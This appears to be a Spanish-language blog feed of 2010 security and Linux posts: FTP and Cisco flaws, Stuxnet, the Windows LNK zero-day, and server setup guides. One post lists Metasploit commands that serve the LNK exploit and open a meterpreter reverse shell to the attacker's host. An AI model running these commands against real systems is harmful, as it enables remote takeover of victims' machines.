Existe un fallo en el servidor FTP a la hora de manejar comandos NLST a los que se le pasan parámetros especialmente manipulados. Esto podría ser aprovechado por un atacante remoto para provocar un volcado del core del proceso FTP accesible por este medio. Entre esos datos, podrían encontrarse hashes de contraseñas.
Un atacante podría enviar un comando NLST a un servidor FTP (al que se debe tener previamente acceso aunque sea con cuenta de enviado) seguido de unos 5000 caracteres para provcar el volcado. Luego el fichero con los hashes (que previamente debe generar con intentos fallidos de adivinar la contraseña) quedará accesible para descarga.
Escalada de directorios en Cisco Content Delivery System
Cisco ha anunciado la existencia de una vulnerabilidad en Cisco Content Delivery System (CDS), y que podría permitir a un atacante conseguir acceso no autorizado a archivos arbitrarios de los sistemas afectados.
El problema reside en un error de validación de entradas en el servidor web de la aplicación Internet Streamer, que un atacante podría aprovechar para acceder a los contenidos de cualquier archivo (archivos de contraseñas, logs, configuraciónes, etc.) mediante ataques de escalada de directorios.
Aplicaciones “portables” para Linux
Portable Linux Apps es una gran iniciativa del proyecto Elementary, que pretende traer aplicaciones portátiles a Linux, tal como las ya conocidas Portable Apps para Windows, solo que tiene varias características que lo ponen varios peldaños arriba. Esto lo logran mediante un nuevo formato de archivo llamado AppImage que utiliza un único archivo para una aplicación completa, y lo mas interesante es que puede ser ejecutada indistintamente en cualquier distro Linux, probada con éxito hasta ahora en Ubuntu, Fedora y openSUSE.
Open Source en la NASA
Un interesante artículo de Internet News nos revela cómo la NASA, uno de los organismos más importantes a nivel científico y tecnológico en todo el mundo,hace buen uso del software Open Source y de distribuciones Linux como Ubuntu.
Las 10 mejores distros de 2010 según TechRadar
En MyLinux han publicado un articulo sobre las mejores distribuciones del 2010 segun TechRadar. aunque ami personalmente no convence del todo el listado, pienso igual que ellos, para gustos los colores
Instalar Mandriva Enterprise Server y Administrar graficamente Controlador de Dominio Principal (PDC)
Nunca había instalado un Mandriva, y la verdad… que a la hora de la instalación es muy sencilla y muy intuitiva. Y es mi primera vez con un Server bajo GNU/Linux con interfaz grafica.
Herramientas a utilizar:Oracle VM Virtualbox ( En mi caso voy a virtualizar el servidor)
Mandriva Enterprise Server 5
Cliente Windows
Descargar Mandriva Enterprise ServerExplotando «LNK» con MetaSploit
MetaSploit nuevamente tiene un PoC para una vulnerabilidad que todavía no posee un parche de corrección de Microsoft.
Para testear esta vulnerabilidad primero debemos actualizar el framework con «svn update», y luego hacemos lo siguiente:
use windows/browser/ms10_xxx_windows_shell_lnk_execute
set SRVHOST 192.168.162.136
set SRVPORT 80
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.162.136
set LPORT 443
exploit
De esta forma vamos a levantar un servidor web en el puerto 80, que cuando la víctima lo visite, nos dará una shell de meterpreter a través del puerto 443. Funciona muy bien!
Todavía no hay un parche de seguridad de Microsoft para corregir este problema, pero pueden encontrar algunos workarounds a continuación:
Microsoft Security Advisory (2286198)
– Security By Default: Solución a la vulnerabilidad «LNK» de Windows mediante Directivas de Restricción de Software
Fuente: http://www.kungfoosion.com/
La nueva variante del Stuxnet vuelve a estar firmada con un certificado válid
El último ataque contra Windows (con enlaces directos) fue descubierto a través de un troyano que ha sido bautizado como Stuxnet. Una de sus características era que los drivers que usaba estaban firmados digitalmente por la famosa empresa china Realtek. Ahora, después de que hayan sido revocados, los atacantes han comenzado a utilizar los de otra empresa legítima: JMicron Technology Corporation.
Los drivers de Stuxnet utilizados como rootkit, estaban firmados digitalmente por la famosa empresa china Realtek. Esto significa que, en principio, solo Realtek puede ser responsable de ese código… excepto que su clave privada haya sido comprometida de alguna forma, cosa que no se ha confirmado todavía. En cualquier caso, Microsoft ha trabajado con Verisign para revocar en sus sistemas los certificados (con el apoyo de Realtek también). Parece que ante este «contratiempo» los atacantes han reaccionado firmando su troyano de nuevo con un certificado válido de otra empresa Taiwanesa dedicada también a crear controladores, llamada JMicron.
Instalar un controlador de dominio secundario
Bueno, ya anteriormente había publicado como instalar un controlador de dominio principal (PDC) y adicional (CDA)
Instalar un controlador de dominio principal
Instalar un controlador de dominio adicional
Ahora vamos a integrarle un controlador de dominio secundario, al que llamaremos CDS
Herramientas necesarias para montar CDS
Virtualbox: Para virtualizar nuestro CDS.
Sistema operativo: Windows 2003 Server Enterprise Edition.
Tener instalado: Controlador de domino Principal y Adicional.
Interesante (y peligroso) troyano que aprovecha un interesante 0 day en Microsoft Windows
Se ha descubierto un nuevo ataque contra Windows, que aprovecha una vulnerabilidad previamente desconocida. Lo interesante (y peligroso) en este caso, es que esta vulnerabilidad ha sido utilizada como nuevo método «revolucionario» para eludir la desactivación de AutoRun y ejecutarse bajo cualquier circunstancia cuando se inserta en el sistema una memoria USB extraíble, por ejemplo. Además, el troyano ha sido firmado digitalmente por una compañía legítima.
Cómo ha sido descubierto
VirusBlokAda descubrió, ya el 17 de junio (lo que da una idea de la posible cantidad de tiempo que esta amenaza lleva atacando silenciosamente) módulos de un malware nuevo. Pasadas unas semanas, alertaron sobre algo realmente inusual en este troyano: su forma de propagarse a través de memorias USB prescindiendo del tradicional archivo autorun.inf, que permite la ejecución automática cuando se detecta un dispositivo extraíble y funcionalidad contra la que Microsoft lleva tiempo luchando.